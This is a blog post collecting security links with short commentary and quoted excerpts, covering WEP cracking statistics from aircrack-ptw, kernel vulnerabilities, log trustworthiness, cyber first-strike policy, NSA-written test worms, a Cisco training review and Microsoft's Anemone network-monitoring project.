Why won’t this cold go away?
Here is the list:
aircrack-ptw – Fast WEP Cracking Tool for Wireless Hacking – Still using WEP? Want to reconsider that?
The aircrack team were able to extend Klein’s attack and optimize it for usage against WEP. Using this version, it is possible to recover a 104 bit WEP key with probability 50% using just 40,000 captured packets. For 60,000 available data packets, the success probability is about 80% and for 85,000 data packets about 95%. Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good condition. The actual computation takes about 3 seconds and 3 MB main memory on a Pentium-M 1.7 GHz and can additionally be optimized for devices with slower CPUs. The same attack can be used for 40 bit keys too with an even higher success probability.
No Ring Untarnished – Interesting article on kernel vulnerabilities.
Kernel vulnerabilities themselves are nothing new, of course. The exploitation of local kernel flaws has been a popular pastime for many researchers and hackers over the years, and in many cases these flaws were shown to be exploited just as reliably as a local flaw in userland software. However, being local to the system has its advantages; the level of interactivity with the system and the data that is available make for more reliable and/or predictable results. We have seen more than a fair share of remote kernel flaws over the years as well, some of which were leveraged in historical attacks (such as the Teardrop denial of service attack).
Some logging notes – Michael mentions on his blog that he doesn’t feel he performs enough logging. From the comments it’s easy to tell where Anton and I stand on this practice 🙂
My own logging? At home, I don’t do enough. At my last job, we did logging, but didn’t use it enough or probably use it properly. At my current job, we don’t do enough logging at all.
Log Trustworthiness Hierarchy – I like this post. One thing I’d like to see is how this hierarchy could be impacted by ‘trusted’ systems that aren’t tuned to remove false positives, aren’t continuously updated for vulnerabilities, etc.
So, do you trust your logs to accurately depict what happened on the system or network? Which logs do you trust the most? How do we increase this trust?
My first draft of such trust hierarchy follows below (from low trust to high trust):
Compromised system logs (mostly pure distilled crap :-), but might contain bits that attacker missed/ignored)
Desktop / laptop OS and application logs (possibly changed by users, legitimate systems owners, etc)
All logs from others systems where ‘root’/Admin access is not controlled (e.g. test servers, etc)
Unix application logs (file-based)
Local Windows application logs
Local Unix OS syslogs
Unix kernel audit logs, process accounting records
Local Windows server OS (a little harder to change)
Database logs (more trusted since DBA cannot touch them, while ‘root’ can)
Other security appliance logs (located on security appliances)
Various systems logs centralized to a syslog server
Network device and firewall logs (centralized to syslog server)
Logs centralized to a log management system via a real-time feed (obviously, transport encryption adds even more trust)
Seek and Destroy: Enhancing America’s Digital First Strike Capabilities – I tend to believe that these capabilities are already in place or are currently in development.
What if the cyber attacks went beyond military targets and focused on civilian infrastructure? Would we look at this any different than a physical attack on our infrastructure? Given our reliance on digital technology is there really a difference?
And now for some security papers:
Forensic Analysis of a SQL Server 2005 Database Server
Understanding the Importance of and Implementing Internal Security Measures
Tuning an IDS/IPS From The Ground UP
OS and Application Fingerprinting Techniques
Another Presentation: FINAL Full Log Mining Slides – Thanks to Anton for posting another one of his excellent presentations.
Today I am happy to release what I consider to be my most interesting old presentation – a full slide deck on log mining. It covers a few years of my research into using simple data mining techniques to analyze logs stored in a relational database. It even comes with examples of real intrusions caught by my algorithms as well as tips on reproducing my results in your environment.
NSA writes more potent malware than hacker – Hmm…this kind of goes back to my first strike point above 🙂
A project aimed at developing defences against malware that attacks unpatched vulnerabilities involved tests on samples developed by the NSA.
The ultra-secretive US spy agency supplied network testing firm Iometrix with eight worms as part of its plans to develop what it describes as the industry’s first Zero-day Attack Test Platform.
Richard Dagnell, VP of sales and marketing at Iometrix, said the six month project also featured tests involving two worm samples developed by a convicted hacker. The potency of the malware supplied by the NSA far exceeded that created by the hacker.
A Waste of Time – Yikes…not exactly a glowing review.
It just wrong when a company like Cisco charges an outrageous amount of money for a class that doesn’t do anything. I’ve been to other classes that were either free or less than $200 for 2 days that I gained much more from. After the class was finished we filled out a class evaluation and I made sure to let it be know that I was unhappy. I was nice and constructive with my criticism. One of the questions was “Based on your experience in this class would you take another Cisco Authorized Training Class?” My answer was a resounding “NO!”. This is my first CAT class and I’m sure that many of them are very well done, but his isn’t one of them.
Congratulations Brian Granier! – I had the pleasure of attending the graduation ceremony while at SANS 2007 in Las Vegas. Congrats Brian!
Our handler Brian Granier became this week the second student to graduate from the SANS Technology Institute!
Microsoft’s Anemone Project – This was the first I’d heard of this initiative. It’s a great idea for reading traffic prior to and after encryption.
Ubiquitous network monitoring using endsystems is fundamentally different from other edge-based monitoring: the goal is to passively record summaries of every flow on the network rather than to collect availability and performance statistics or actively probe the network…
It also provides a far more detailed view of traffic because endsystems can associate network activity with host context such as the application and user that sent a packet. This approach restores much of the lost visibility and enables new applications such as network auditing, better data centre management, capacity planning, network forensics, and anomaly detection.